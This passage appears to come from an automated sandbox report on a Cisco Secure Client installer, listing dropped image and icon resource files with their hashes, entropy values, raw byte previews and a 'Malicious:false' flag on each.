                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-8QMV1.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-8TT70.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-9RJBH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-A6JG7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-AA0F8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-AVVJ8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-BG7AP.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-BSIV0.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-C3RPK.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-CCO54.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-CHCDT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-DQ92C.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-E3UHO.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
